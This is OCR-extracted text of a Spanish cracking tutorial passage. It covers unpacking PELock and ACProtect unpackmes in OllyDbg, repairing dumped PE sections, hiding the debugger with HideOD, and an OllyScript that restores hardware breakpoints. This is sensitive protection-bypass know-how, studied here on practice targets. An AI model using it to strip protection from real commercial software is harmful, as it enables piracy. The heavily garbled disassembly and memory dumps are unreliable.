Characteristics: [coooooa0 Characteristics: [Cooooo40 char. wizard 


To modify a value just change it in the right box and click on apply changes... 


Ahora le hacemos una pasada para que repare el header el LORDPE nuevamente con la opcion 
REBUILD PE. 


Rebuild Status ] 


Starting to rebuild dumpeado pelock_.exe... OK 
Filesize: B3000h | 


Wipe Relocation...no Relocation present 
Realigning...done 

Current filesize: 76987h 

File minimized to: 66% 

Rebuild ImportT able...not needed 
Walidate PE image...done 


New filesize: 76987h le a 
File minimized to: 66% 
Rebuilding finished. 
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This is a PELock 1.06 UnPackME 
(Code Redirection) 


Tf you unpack it write a tutorial :) 


Lo ejecutamos y vemos que funciona si lo abrimos en OLLYDBG. 


[c] File View a dd E window Help 


SE handler installation 
64:A1 M0BBBa! MOV EAX, QUDRD PTR FS: [0] 


50 PUSH_EAX 

64:8925 BOBA MOV DWORD_PTR FS:[07,ESP 

38304 AS -58 

53 
56 
Ya 


PUSH EDI 
3965 ES MOU DWORD _PTR SS: [EBP-18],ESP 
E S8AD665008 dunmpeado. 66A34365 


DB_60 
3302 Z0R EDX, EDX 
3AD4 MOU DL, AH 


Veamos el mapa de memoria 


VOUOSH00OOO]| VDODO 1000 FEV] nu ru 
503890000 | 0091000 Priv| Ri RU 
0300000 | BOBB4BDA Priv| Ri RU 
90300000 | 000604000 Priv| Ru Ruy 
BB3E0000 | BOBB3ODA Map |R R MevicerHarddi 
BO3F0000 | BOBBZ2000 Map |R R 
60400000 | 00061900| dumpeado PE header Imag|R RWE 
60401000| 00044000 | dumpeado' .teddy code Imag|R RWE 
90448000 | B4BBCOBA| dumpeado! . teddy Imag|R RWE 
60457000 /| 6990089000| dumpeado! . teddy Imag|R RWE 
604600000 3006| dumpeado' .teddy Imag|R RWE 
60463000 S000| dumpeado| .teddy resources Imag|R RWE 
60468000 | 0 BBB! dumpeado| .teddy Imag|R RWE 
60475000 | 66658B9900| dumpeado! .mackt imports Imag|R RWE 
BBASG00DO| BBB3COBA| dumpeado| seccion | data Imag|R RWE 
Bl [51515185)5/5/5]=151515] Map ¡RE RE 
[15] (l0JN15155)151515] Mao ¡RE RE 


Vemos que el LORDPE para hacerlo al dumpeado funcional agrando la seccion anterior para 
hacerlas contiguas con la que agregue, y luego viene la seccion que le faltaba que va desde 0480000 
en adelante y que tiene el codigo que dumpeamos con el PUPE. 


D43H1 VUDOJOI MUY EH, UWURO FIN FD:LUJ 


PUSH_EAXx 
64:3925 B0B0/ MOU DWORD_PTR FS: [61,ESP 
3304 AS ADD ESP, -58 


EDI 
MOU DWORD _PTR SS: [EBP-18],ESP 


DB 60 Backup 
OR EDX, EDX 

MOU DL, AH Copy 
MOU DWORD PTR DS: [45E€ . 
MOU ECX, EAX Binary 
AND ECX, GFF 
MOU DWORD PTR Ds:r4see  Assemble 
SHL ECX,8 Label Ñ 
ADD ECX, EDX abel : 
Hou DUORO PTR DS:[4SEÉ — Comment ; 


MOU DWORD PTR DS: [45E€ Breakpoint 


JNZ SHORT 00427218 ME EraES 


Run trace 


De 


y 


AS 28564500 
Es 94210000 
8500 


New origin here C 
Go to 


Si miramos el salto vemos que ahora tenemos alli el codigo faltante. 


- - . . - Ll 
A] PJ] Mit A A LE MW] HC ¡1 |K/B]RKj+S] :=j2% 
FF1S DCOA4608 kernel32.GetVersion 
ES 6C299AFF dumpeado. 004271DC 
6C INS BYTE PTR ES: CEDIJ,DX 140 command 
FF1S 84094600 CALL DuORO ETR DS: [4689841 kerne 132. GetCommandLineñ 
E9 CS299AFF dumpeado. 00427244 
CS FF1580 ENTER 15FF,80 
0946 BB OR DWORD PTR DS:[ESIJ,EAX 
ES 532A9AFF ¿Mp 99427208 
8D05 E4ESF1B3 |LEA EAX,DWORD PTR DS: [B3F1E5E4] 
28086 261A0E4C |LEA EAX,DWORD PTR DS: CEAX+4C0E1A26] 
E9 562A9AFF JMP 0042720 dumpeado. 004272FD 
56 PUSH ESI 
FF1S 9C0B4609 a kerne 132. GetModu leHandleA 
E9 S62A9AFF dumpeado. 004272FC 
56 PUSH ESI 
63 FFOBBB0a PUSH BFF 


dumpeado. 0042720B 


Si la imagen quedo muy grande y se agrando mucho el archivo se puede parchear todo lo que 
necesitamos y luego empacarlo con UPX que lo dejara pequeño y funcional y podremos 
desempacarlo cuando querramos ya el GUIPEX tiene la opcion de empacar y desempacar asi que lo 
tenemos bien dominado, aunque aquí no es necesario ya que el dumpeado, reparado y con la 
seccion agregada y la memoria intermedia allocada quedo en menos de 500k. 


Otra opcion para los que quieren estudiar otra forma de reparar el antidump, es agregar la o las 
seccion faltante a continuacion de la ultima para que no se agrande mucho el exe, y luego cambiar 
el oep en el dumpeado y hacer un injerto para ubicarla en su posicion creandola con VirtualAlloc y 
copiando los bytes que agregamos alli, este metodo esta muy bien explicado por marciano en el 
ultimo concurso de crackslatinos si alguien quiere mirarlo se los recomiendo pues cuanto mas 
metodos conozcamos mejor, el link es. 


http://www.ricnar456.dyndns.org/CRACKING/NUEVO%20CURSO/CONCURSOS%20Y%20C0O 
LABORACIONES/CONCURSOS/CONCURSOS%202004- 


2005/CONCURSO%2078/PELock%20v1.06%20(Al11%20protections)%20- 


Z20por%20marciano.rar 


user y pass:hola 


En dicho unpackme de pelock que es parecido al que yo hice, la tabla esta redireccionada que era lo 
que yo queria tambien reparar con el script, pero mi version no tiene la IAT redireccionada por lo 
cual aplicaremos el script en una futura ocasión ya que habra miles de packers que lo necesiten. 


Alli marciano utiliza el otro metodo que es hacer un injerto que cargue la seccion faltante en vez de 
cambiar el Virtual Offset, muchas veces yo he utilizado ese metodo y es muy bueno, aunque si son 
muchas las seccion faltantes es un poco cansador ya que hay que agregar una a una, con el metodo 
de agregarlo con el lordpe nos queda habilitada toda la seccion de memoria entre la ultima seccion y 
la seccion faltante. 


De esta forma con el metodo del PeEditor conviene agregar siempre primero la seccion mas lejana, 
ya que de esta forma, al reparar con el LORDPE, toda la memoria entre la ultima seccion y el inicio 
de la seccion faltante quedara allocada sin problemas y podremos copiar del original detenido en el 
OFP y pegar los bytes en el dumpeado y luego guardar los cambios en este ultimo de cualquier 
seccion intermedia faltante. 


Creo que es claro el ejemplo de que es lo que ocurre al agregar la seccion mas lejana, si esta empeza 
en 0480000 como vemos en la imagen de abajo del mapa de memoria del original, el lordpe agranda 
la seccion anterior el dumpeado para que termine justo antes de 0a80000. Lo cual si nos falta alguna 
seccion mas antes de a80000 como las que tenemos en rosado, la podemos copiar y pegar 
facilmente y guardar los cambios. 


MAPA DE MEMORIA DEL ORIGINAL 
DU TUDO] DUDO UNA TIivY] FW Twa 
50390000 | BOB10B0B Priv! Ru Ru 
50400000 | 00991900 | UnPackMe PE header Imag|R RWE 
00401000! 60044900 | UnPackMe! .teddy code Imag|R RWE 
50448000 | B4BBCODO | UnPackMe| . teddy Imag|R RWE 
50457000 | 009989000 | UnPackMe! . teddy Imag|R RUE 
50460000 | 09963000 | UnPackMe| . teddy Imag|R RWE 
60463000 | 0006089090 | UnPackMe| .teddy resources Imag|R RWE 
504680900 | BBBBADBAO | UnPackMe| . teddy SFX, imports| Imag|R RWE 
90430000 / 00021000 Priv! Ru Riu 
00480000 | OOBBEDOD Map ¡RE RIE 
560570000 | B0BB2000 Map ¡[RE RE 
20530000 | 00103000 Map |R R 
60001000 Priv! Ru Ru 
60176000 Map ¡RE RE 
661000 Priv! Ru Ru 
100004000 Priv Ru y 
000603000 Map |R R xDevicerHarddiskVolume: 
40001000 Priv! Ru Ru 
A: 00004000 Priv! Ru Ru 
B0BB30Da Priv! Ru Ru 
[nrasls1515)45]5]515)151515] Map |R R 
BBAS0BDO. OOB3COBO Priv Ru 
DOBAGODO | BOBB1DBO Priv! Ru Ru 
al 66! BOBAZ000 PriviRW- Gual Ru 
MAPA DE MEMORIA DEL DUMPEADO 
BO3F0000 | BBBBZ2000 Map |R R 
604090000 | 00061900| dumpeado PE header Imag|R RWE 
60401000| 00044000 | dumpeado' .teddy code Imag|R RWE 
504480900 0096C909B8| dumpeado| .teddy Imag|R RWE 
66457000 | 00009990 | dumpeado| .teddy Imag|R RUE 
50460000 | 6990683000 | dumpeado| . teddy Imag|R RWE 
60463000 | 00008990 | dumpeado| .teddy resources Imag|R RWE 
50046860900 | BO0BBABBB| dumpeado! .teddy Imag|R RWE 
560475000 | 0060B990| dumpeado| .mackt imports Imag R RWE 
BBAS0000| BBBSCOBA| dumpeado| seccion | data Imag|R RUE 
BBACOBAÓ | BOBBEDOS Map [RE ERE 
B0B30000 | BOBBZ2000 Map ¡RE RE 


Alli se ve que cualquier seccion del original anterior a AS0000 existe en el dumpeado y esta 
allocada ya que LORDPE agrando la seccion mackt, hasta hacerla contigua a la que agregamos, con 
los cual abarcamos en forma continua y tenemos allocada toda la memoria desde 401000 hasta 
A80000 + 3c0000 (largo de la ultima seccion)= 0E40000 


33 ER 3B/¡8U Macro 83[+y 5 L4ve 
30 3D 80 83 52"1F 45| óBLCS3RYE 


Command 2 DA80000 + 300000 | HEX: E40000 - DEC: 
Module CXWINDOW'SAsystem32umdmstrrm. dll 


O sea cualquier seccion que vaya entre 401000 y E40000 ya la tenemos allocada en el dumpeado si 
necesitamos agregar bytes solo copiando y pegando del original detenido en el OEP al dumpeado y 
guardando los cambios ya lo tendremos corriendo. 


Veremos ejemplos usando ambos metodos, ya que ambos son muy buenos, asi que ahora tienen dos 
tutes para leer, este y el de marciano, y practiquen ambos, porque hay veces que es mejor usar uno y 
en otras es mejor usar el otro según las circunstancias. 


Hasta la parte 42 
Ricardo Narvaja 
13/04/06 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 42 


Bueno iremos introduciéndonos lentamente en packers mas difíciles y verán que los métodos 
que utilizaremos son muy variables según el caso, por lo cual hay que tener la mochila bien 
llena de trucos y practicar cada vez mas, el que nos ocupa ahora es el ACPROTECT 1.09 f el 
unpackme con todas las protecciones habilitadas. 

Dicho unpackme tiene un poco de todo, por lo cual iremos despacio y analizando cada parte 
de la protección en varias entregas, no nos alcanzara con una sola parte para poder ir despacio 
y claramente. 

El unpackme esta adjunto a este tutorial, así que no hay problema, abramoslo en nuestro 
OLLYDBG parcheado y con los plugins para ocultarlo. 


PU - man 


[e] File View Debug Plugins Options Window Help 


ex] e fa] vis] $idi e] + ujejmitiwjn]c/+]k]B/RÍ... 


CLC 


INC _EBP 

E9 2CHG_ECx,EBP 
91000000 UnPackMe. 0046B00B 
33 UnPackMe. B0046AFS3F 
24 ADD AL,24 
PUSH ES 


RETN , 
66:C1ED A9 SHR BP,0A9 Shift constant out o 


Es 0100000909 CALL ab46BaIa UnPackMe. 0046BB1A 
Ba llnPark Me. ARIAAF IF 


ARIARA1 O 


Allí esta abierto en OLLYDBG, y ya que tiene de tiene de todas las protecciones, 
chequeemos si corre en OLLYDBG, ya que si no lo hace debemos antes que nada ver como 
solucionar eso. 
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This is an ACProtect 1.099 UnPackME 
All Protections Enabled 


Tf you umpack it please write an unpackme :) 


Pues aquí en mi parcheado4 ,que adjunte en la parte anterior,con todas las excepciones 
marcadas y usando el plugin HideOD 0.12 con la configuración que vemos abajo, no tiene 
ningún problema y corre perfectamente, recuerdo que este packer verificaba mediante las apis 
Process32Next cual era el proceso que lo había abierto y si descubría que no se habia abierto 
por medio de una ejecución de doble click, o sea si lo había cargado un loader o un debugger, 
no corría, pero el plugin HideOD, trae protección contra ese truco, por lo cual el antidebugger 
del mismo queda completamente anulado sin ningun dolor de cabeza. 


Option 

[Y Auto Run HideOD ÍV HideNtDebugBit 

¡Y SetDebugPrivilege IsDebuggerpresent 
NtGlobalFlags 

Ív OutDebugStringÁ HeapFlags 
ForceFlags 


Ív Process32Next 


Zw0Q Inf tionP 
Ív CheckRemoteDebuggerPresent Matet 


C none 
iv ZwSetinformationThread (+ methodl 


Y UnhandledExceptionFilter  method2 


en 28 


227772[PEdiy.com) 


Bueno así que no debemos preocuparnos por eso, por lo cual nos concentraremos en llegar al 
OFP. 


EE Debuegging options 
Commands | Disasm | cpu | Registers | Stack | Analysis 1 | Analysis 2 | Analysis 3 | 
Security | Debug | Events | Exceptions | Trace SFX | Strings | Addresses | 


“w'hen main module is self-extractable: 
[Y Extend code section to include extractor 
C Stop at entry of self-extractor 
(+ Trace real entry blockwise [inaccurate) 
: C Trace real entry bytewise (very slow!] 


[4 Use real entry from previous run 
T Pass exceptions to SFX extractor 


De los varios métodos que vimos tanto usar el OLLYDBG para hallar OEPs, como utilizar el 
buscador de OEPs incorporado que trae el OLLYDBG va perfecto, así que vamos a la 


pestaña SFX, y ponemos la tilde en TRACE REAL ENTRY BLOCKWISE y aceptamos y 
reiniciamos el OLLYDBG el cual luego de un rato parara aquí. 


MA A A A 2 FI El A O O O E E E E E E A JE 


abn42/1B1 31 DB 31 
an4271B2 73 DB 73 CHAR *s” 
183 F2 DB F2 
184 19 DB_19 
E . 68 60BE4500 |PUSH 450E60 Real entry point of SFX code 
2] . 68 [8924200 |PUSH_42920C8 SE handler installation 


64:A1 006000! MOV EAX, DWORD PTR FS: [0] 
50 PUSH_EAX 


6 64:8925 0061 MOV DWORD PTR FS: [07,ESP 
Bad > . 8304 AS ADD ESP, -58 
D0427100| . 53 PUSH EBk 


=> 


DO 
. 


Ahora la cuestión es, es este el OEP real o tiene stolen bytes. 


Miremos un poco el stack en este momento. 


FFFFFFFF 

BB12FFFO 

7C3816D4F| RETURN to kernel132.7C0816D4F 

7C920738|ntdll.7C0920738 

FFFFFFFF 

7FFDDGBO 

230544938 

BaB12FFCS 

34268048 

FFFFFFFF|End of SEH chain 

7C8399F3|SE handler 

7Cc3816058| kerne 132. 70816058 

000000Ba 

0J5Ja/5]5J5/515) 

0JaJa/5J515/515) 

504680950| UnPackMe. <Modu leEntryPoint> 
BO12FFFC| B0BBBBBA 


[ml 


Si quitamos la tilde de buscar el OEP y reiniciamos 


7C816D4F| RETURN to kernel32.7C81604F 
BB12FFCS| 7C920738|ntdll.7C920738 
BB12FFCC| FFFFFFFF 
BB12FFDO| 7FFDABOO 
BB12FFD4| 80544938 
BB12FFDS| 0B12FFCS 
BB12FFDC| 84266B40 
BB12FFEO| FFFFFFFF|End of SEH chain 
BB12FFE4| 7C8399F3| SE handler 
BB12FFES| 7C816D583| kerne 132. 70316058 
BB12FFEC| 1000BBBDn 
BO12FFFO| 100BBBBDa 
BB12FFF4| BBBBDODO 
BB12FFFS| B046B000| UnPackMe. <Modu leEntryPoint> 
BB12FFFC| MBBBBBDa 


mos 


Vemos que el stack cuando esta detenido en el OFP, tiene dos valores mas de los que tenia 
cuando arranca en el inicio, y salvo raros casos eso es un indicio de que hay stolen bytes, así 
que nos prepararemos para hallarlos. 


Pero antes debemos corregir el script para evitar que nos anulen los Hardware Breakpoints 
que les enseñe en las partes anteriores ya que tiene un pequeño bug y lo necesitaremos en este 
y en muchos packers mas. 


Aquí lo podemos probar ya que si ahora queremos parar en el OEP que ya conocemos y 
ponemos un HBP ON EXECUTION en el, vemos que no para ya que el programa lo 
deshabilita, inclusive usando el script que les di, tampoco para, ya que este tiene un bug. 


Antes que nada explicare donde estaba el error, para que se entienda como quedara el script y 
porque hubo que modificarlo. 


Arranco nuevamente el unpackme en el OLLYDBG, y le coloco los dos BP tanto en 
KiUserExceptionDispatcher como en el CALL que nos lleva a ZwContinue como se ve en la 
imagen. 


nue VIEW UCUUY. FIUQnIiS PLD IA GS 


EXE a) vis] $0) e] + 1] ejmjt[wu]c]+]x/B]R]-]s] ¿2 


5 8B4C24 B4 MOU ECX, DWORD PTR SS: [ESP+4] 
8B1024 MOU EBX, DWORD PTR SS: [ESP] 

51 PUSH ECH 

53 PUSH EBX 

Es C7acoz0B | CALL 7C9477C1 ntdll.7C09477C1 

GACa 


OR AL, AL 

ntdll.7C91EBDA 
POP EBXx 
POP ECX 


PUSH O 
PUSH ECX 


Fla 


, [la] 
11EBFFFF 
E 0B 


ntdll.Z¿wContinue 
ntdll.7C91EB1S 


Dd 


POP EBXx 


Command Bp KiUserExceptionDispatcher | 
Program entry point 


Ahora colocare un Hardware BP on execution en la dirección del OEP, para probar si lo borra 
O no, podría ser cualquier otra dirección, pero como sabemos que por allí pasara seguro y 
llegara después de haber hecho todas las trapisondas del packer, pues que mejor que usar esa 
dirección para probar el script. 


[a] He view Lebug Plugins Options window Help 


EEN eu) vilo] $0) e] + Ljejmr[wu]cj+]x/B)R]-]s] iS 


PUSHAD 


CLC 
INC _EBP 
7E9 XCHG ECX,EBP 
019000909 UnPackMe. 0046B09B 
4 83 UnPackMe. BB46AFSF 
24 AL, 24 
ES 
:¿C1ED A9 HR BP,0A9 Backup » bnstant out of range 1..3 
010000909 Co . DO4E6BDÍA 
“ode LES Ef, FUORD dl ries ¡ 
, t t t 
6 Binary » ton O segmen register 
a .DO46BD23 
E ea Space " OO4CAFAB 
1515] , 
Ba 010000909 LAA ' .DO46B02B 
1215] 83 Comment ; . BO4GBAFAF 
an 24 DD AL, 24 Ñ 
ala USH ES Breakpoint » 
1515] 
12] :¿C1F9 D9 AR CX,8D9 Run trace » bnstant out of range 1..3 
Ba 0190000909 . BO46BB3A 
Ba 83 rs E ] 
a0 LES EAX, FORD Previous Minus ter 
20 sa 01000000 PUSH EAS Follow in Dump » Expression Ctrl yt 
a 75 58 CePTORMODE) ; 
ó AL Search For » 
Find rafaranrar ba » 


AMÍ en el inicio, hago GOTO EXPRESSION y coloco la dirección del OEP que era 4271B5 


Enter expression to follow 


[427163 y] 


Cancel 


y 


[e] nie YVISWY— LUCUUY  FIUYQnis  UpLuUIS — YYIIUUYY ME 


ala + u] vis sido] el + Ljelmtiwjnfc)+]k]8/r]-- Js] 3?) 


Real entry point of SFX code 


CMC 
po id MOU BYTE PTR DS: [289EC729], AL 
ala ST,ST(4) 


UnPackMe. 60427190 
OR DWORD PTR DS: [EAX-21],ESP 
INC ECXx 
UnPackMe. 00427183B 
LOS EBP,FWORD PTR DS: En ] Modification of segment register 
INS DWORD PTR ES:CEDIJ Ju 1/0 command 
BYTE PTR DS: [EDI-761, Sora Shift constant out of range 1..31 


anñ Al .99 


CMC : 
MOU BYTE PTR DS 


Fcomi sT,stc4) Backup 
PFD Copy » 
OR DWORD PTR Df e j ES 
INC EC ¿  Assemble Space 
Label j 718B ! 
LDS EBP,FWORD F of segment register 
6D INS DWORD PTR E Comment h 
Co4? SA C4 ROL BYTE PTR Df E PES 
A E a too: 
1841 C7 SBB BYTE PTROD  Runtrace » | Conditiomal 
as 4383160509 plo PTR Df Conditional log 
New origin here Ctri+Gray * a 
ES 7 y Run to selection 
XOR AL,9C Go to d 
MOU BL, BAF Follow in Dump » | Memory, on access 
Memory, on write 
rs BXx Search for » pl 
On ORD E Find references to » Hardware, on execution 
92 XCHG_EAX, EDX View » | Remove hardware breakpoint 
8F3499 CFD9D2M POP DWORÓ PTR [ 
a Copy to executable > 
É Set real SFX entry here 
Analysis » 


Puiran dahuinnad nrarare 


Marco la primera linea y le coloco el HARDWARE BPX ON EXECUTION. 


Ahora doy RUN. 


18] nie YMEYWY  LUCUUG  FIUQIIS  pPLUOIS —Y"YIIUUY ME 


EEE a ESA CREERSE, 


E 
2B1C24 MOU EBX, DUORD PTR ES ÓN 
51 PUSH ECX 
53 PUSH EBX 

ES C78C0200 | CALL 70947701 ntdll.7C9477C1 
BACO 


OR AL,AL 

ntdll.7C91EBGA 
POP EBx 
POP ECX 


PUSH B 
PUSH ECX 


£ 


1515] 


1 
11EBFFFF ntdll.ZwContinue 
B 0B 


ntdll.7C91EB15 


E 


POP EBx 
POP AD 
AR PILUISH 


o ooo 


UnPa 


ckMe. 


JA pd pa pd 


¿PUNTERO AL 
CONTEXT 


lo 


¿1050505050500 
INMODAAANDNADADADANO 


pa 


Cuando para en KiUserExceptionDispatcher el puntero al context esta en el segundo lugar del 
stack, miremos el CONTEXT en el dump. 


ntdll.Kilser 


OD Ane 
BH... 4UG. 
1 AAA 
lrédg.G_é 
eras. 
ólG.t... 
FO... + 
1...080 E 


e075Ó.. 


a ad 


Por supuesto no explicare todos los valores de la estructura CONTEXT, pero si los que 
utilizaremos por ahora. 


12 


isters (FPU) 
| EAX BOABBBGA 
ECX S395F4700 
EDxX 67649BCC 
=|EBxX 00009009 
(== (ESP 0012FC64 
EBP 00064009 
ESI 674E4B9F 
EDI 06471398 UnPackMe. 60471398 


EIP 7C91EREC ntdll.KillserExcept ionDispatche 


Co ES 0623 32bit BD(FFFFFFFF) 

P1 CS 0018 S2bit O(FFFFFFFF) 

AD SS 0023 32bit O(FFFFEFFF) 

z 1 DS 0023 32bit BLFFFFFFFF) 

SO FS 003B S2bit 7FFDDOGO(FFF) 

ul E 65 6008 NULL 

00 LastErr ERROR_MOD_NOT_FOUND (06BBBB7E: 
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE) 


STO empty -UNORM BCEO 61050104 BOBABBAA 
ST1 empty 6.0 
ST2 empty 6.08 
Zero 
Modify Enter 
Copy selection to clipboard Ctri+C 
Copy all registers to clipboard 
Push FPU stack 


Pop FPU stack 


hr] 
” 

o 
o 
pr pa 
o 
no 
Rar 
o 
m 


View MMX registers 
View 3DNow! registers 
View debug re 


UnPack 


Appearance 


ln Dale 


En los registros, cambio la vista para ver los DEBUG REGISTERS, sí no aparece la opción 
para cambiar es porque ya esta en la vista correcta. 


(5TTaT=15]5T:]] 
395F4700 
676498CC 
15]s1515151515]] 
p012FC64 
51512 51515]] 
674E4B9F 
60471393 UnPackMe. 605471398 


7C91EREC ntdll.KillserExcept ionDispatcher 


ES 0023 32bit BD(FFFFFFFF) 
CS 0618 32bit O(FFFFFFFF) 
SS B023 32bit O(FFFFFFFF) 
DS 6023 32bit O(FFFFFFFF) 
FS B03B 32bit 7FFDDOBO(FFF) 
65 6008 NULL 


LastErr ERROR_MOD_MOT_FOUND (009099B7E) 
000090246 (NO,NB,E,BE,NS,PE,GE,LE) 


Esos son los famosos DEBUG REGISTERS van desde Dr0 a dr7 , los correspondientes a los 
HBP son Dro0, Dr1, Dr2 y Dr3. 


Cuando el programa para en un BP, en ese momento los DEBUG REGISTERS del 
OLLYDBG se actualizan con los valores de los HARDWARE BPX que estén vigentes en ese 
momento, como vemos allí, paro en un BP y nos muestra los HBP actuales, en Dr0 esta 
4271B5 que es el valor del hardware BPX que colocamos, Dr4 y Dr5 no se utilizan, el Dró6 no 
nos interesa por ahora y el Dr7 indicara el tipo de hardware bpx que esta colocado segun una 


tablita que veremos mas adelante, lo importante es que vemos que DrU tiene nuestro 
HARDWARE BPX, ahora miremos el CONTEXT. 


ntdll.KillserApcDispatcher+2C 
Address p 
661 1 600ÉE 55| ql 408. 
als 6 600 50 6 00 MY 
a 00/FO OF FF FF... : DRO 
BB bb) TF FF FF|60..08 
dí F-EENEE FF FF| E 
2 3 02/18 00 D9 06| $+Cs0+,.,. 
dz) E a FF] “iros 
a a 00 5 Bll....0040 
15] a E 5 Dl cr 2... 
0 la) DR2 3D02a2....... 
BB Lo A 
an 36 60 00 60 O aca 
155 36 600 00/60 00 OBl .oo.m. o». 
155 50 00 00 06 00 OBl.ooomos. 
BB 66 68 a Bo an 
an aa sn 66 00 
5 BB 60 FF 3 
BB 06 Ba 6 
06 0B Bao 6 coofosa 
66 08 97 BOI... yUG. 
4B 4E 6; BO B| $KNg.... 
a 64 67 47 Iredg.G_é 
vb ya al HO 16 DOI ..... 3. 
13 47 66/1B 65 
BB 6B2 66 60/58 FF 
BB 66 00 00/ 7F B2 
BB 66 00 00/50 Ba 
ala 66 00 500/00 Ba 
pjs BB FF FF|S30 1F 
pjs 66 06 00/50 Ba 
a 61 65 61/E9 
ab 66 BB BB BB 


Ahí vemos la posición en el context de los registros DrUO a Dr3, en amarillo esta la dirección 
4271b5 que corresponde al HBP que colocamos y que esta activo, los otros tres en rosado 
están a cero pues solo colocamos un HBP los otros están vacíos. 


O sea cuando el programa llega al manejador de excepciones como dijimos, pondrá a cero 
estos valores del CONTEXT, si nos fijamos, damos RUN para que llegue al 2do BP. 


60B12FCD4|0 
BB12FCOC| Bb B 
0012FCE4/60 06 6u Gala 
0B12FCEC|66 66 60 06 9b 
0012FCF4/60 06 60 6 
BB12FCFC]| 60 06 
0012F004|0 
0012FDO0C| 00 
0012FD14 
6B12FD1C ; 
0012F024 


DONDE 
Du 


«4 


PR aaa aaa 
NE do 


S 3 ala Ho. glIG. 
DB12FD2C|< a 000 $KN9.... 
0012FD34|CC 98 a 47 lréda. G_é 
9012FD3C| M0 % 3 


6a012F044| 95 
aB12FD4C 
0012FD54 
6B12FDSC|56B ab z a 06 ab 
ARA12FNA41 AA AR AA ARALAR AR AR AR 


Vemos como al pasar por el manejador de excepciones puso a cero Dr0 y el error mio fue en 
el script, volver a restaurarlo aquí, ya que si recuerdan al llegar a este 2do BP, el script iba a 
restaurarlos, pero he aquí el error ya que lo que borro DrÚ es solo la preparación ya que 
coloca el CONTEXT en la forma que QUIERE que quede, la verdadera actualización de los 
HBP ocurre al salir de ZwContinue y entrar a RINGO, antes de volver al programa, o sea que 
por mas que yo aquí vuelva a colocar los HBP en OLLYDBG, no sirve, pues estando 
preparados a cero en el CONTEXT, al salir de ZwContinue lo que hará sera borrarlos sin 
mas. 

Entonces aquí hay dos posibilidades, o bien cuando para el primer BP guardar los valores que 
leo en el CONTEXT de los DEBUG REGISTERS y cuando llega al 2do BP, volverlos a 
copiar al CONTEXT evitando lo que ha hecho de ponerlos a cero, poniendo en Dr0..Dr3, los 
valores que tenían, los cuales actualizara normalmente al volver al programa. 

Otra opción es hallar en el CONTEXT la dirección de retorno al programa, poner un BP allí, 
y ahí si cuando para, restaurar los HBP ya que ya fueron borrados y ya volvió al programa, 
así que es como ponerlos nuevamente, y luego borrar el BP de la dirección de retorno. 


Esta segunda opción me pareció mas breve, pero donde esta ubicada en el CONTEXT la 
DIRECCION DE RETORNO al programa? 


B812 


661 


1d 
$Cs0+. e 
“irOs. 
e... 9070 
$ 


DOS 


$KÑD. 0... 
lrédg.G_é 
e... 3%, 
dlG.+... 


¡DO 


Si a la dirección de inicio del CONTEXT le sumo 0B8 obtengo el puntero a la DIRECCION 
DE RETORNO, en este caso en mi maquina. 


12FC8c + 0b8 = 12FD44 


O sea que 12FD44 en mi maquina apunta a la dirección de retorno al programa, si en el script 
coloco un BP allí, cuando pare ya habrá vuelto al programa, luego de borrar definitivamente 
los HBP y podre volverlos a colocar, veamos como quedo el script. 


var aux 
inicio: 


A 


bphws 4271b5, 
trabajo: 


eob pirulo 
run 


pirulo: 

log eip 

cmp eip, 7c9leaec 
je quitar 

cmp eip, 7c91eb03 
je restaurar 

cmp elp,aux 

je restaurar2 


jmp final 


quitar: 
bphwc 4271b5 
jmp trabajo 


restaurar: 

mov aux,esp 
mov aux,[aux] 
add aux,0b8 
mov aux,[aux] 
log aux 

bp aux 

jmp inicio 


restaurar2: 
bc aux 
jmp inicio 


final: 

MSGYN "Continuar?" 
cmp $RESULT, 

je inicio 

ret 


Estrictamente es el mismo script que antes veremos que cambia, al inicio 
var aux 


var es el comando para declarar una variable, declaro la variable aux, que me serviré de 
auxiliar para guardar y calcular la dirección de retorno al programa desde la excepción. 


restaurar: 
mov aux,esp 
mov aux,[aux] 
add aux,0b8 
mov aux, [aux] 
log aux 

bp aux 

Jmp inicio 


Allí vemos la parte donde antes se restauraban los HBPs, ahora paso a aux, el valor de ESP. 


mov aux,[aux] 


Lo que hace es, ya que aux apunta a ESP, lo que necesitamos es el contenido de aux ya que 
en el momento que para en el CALL, el contenido de ESP apunta al inicio de la estructura 
context, o sea que luego de esta sentencia, aux queda con la dirección de inicio del context en 
mi caso 12fc8c, luego le sumamos 0b8 con lo cual obtendremos 12fd44 o en sus maquinas el 
puntero a la dirección de retorno y finalmente 


mov aux, [aux] 


Mueve a aux su propio contenido, quedando la dirección de retorno finalmente en aux y en la 
linea siguiente Bp aux, coloca el Bp en la dirección de retorno al volver de la excepción y 
luego vuelve a correr el programa y finalmente 


pirulo: 

log eip 

cmp eip, 7c9leaec 
je quitar 

cmp eip, 7c91eb03 
je restaurar 

cmp eip,aux 

je restaurar2 


al evaluar las excepciones ve si se produce alguna en la dirección de retorno con lo cual 
sabemos que esta en el punto de retorno al programa. 


restaurar2: 

be aux 

Jmp inicio 

Por lo tanto al haber vuelto ya al programa, con el comando BC borra el breakpoint que 
colocamos en la dirección de retorno y luego vuelve a inicio, donde vuelve a colocar los 


HBP borrados y a dar RUN nuevamente con todo restaurado. 


Bueno ya vimos los cambios realizados no son gran cosa, veamos ahora si funciona, 
reiniciemos el programa. 


Editamos el script para que ponga el HBP en la dirección del OEP 


Archivo Edición Formato Yer Ayuda 


war aux 
1m1c1o: 


bphws 4271b5, "x" 


trabajo: 


eob pirulo 
run 


irulo: 

og eip 

cmp eip, 7cdleaec] 
je quitar 

cmp eip, 7c9leb03 
je restaurar 

cmp eip, aux 

je restaurar2 

jmp final 


quitar: 1 
bphwc 4271b5 
jmp trabajo 


restaurar: 
mov aux, esp 
mow aux, [aux] 
add aux, 0b8 
mow aux, [aux] 
log aux 

bp aux 

jmp inicio 


restaurar2: 
bc aux 
jmp inicio 


final: 

MsGYN "continuar?" 
cmp $RESULT, 1 

je inicio 

ret 


Allí editamos la dirección del HBP en el script que queremos que no nos borre, ponemos los 
dos BPs a mano necesarios para su funcionamiento, borramos todos los HBP anteriores que 
habia. 


ug Plug | Options Window Help 
M 1Hideoo » 


2 Puntos Mágicos » 
3 +BP-OLLY » 
won  +OllyDump » 
» 
» 


5 PolyMorphic BreakPoint 


6 OllyScript 
q 7 CommandBar >»! Abort sh i 
ATRAE | Pause y 


Corremos el script, no olvidemos de poner los dos Bps y poner todas las tildes en exceptions. 


PUSH 455E66 Real entry point c 
24: PUSH 4292038 
2005000056 |MOU EAX, DWORD PTR FS: [6] 


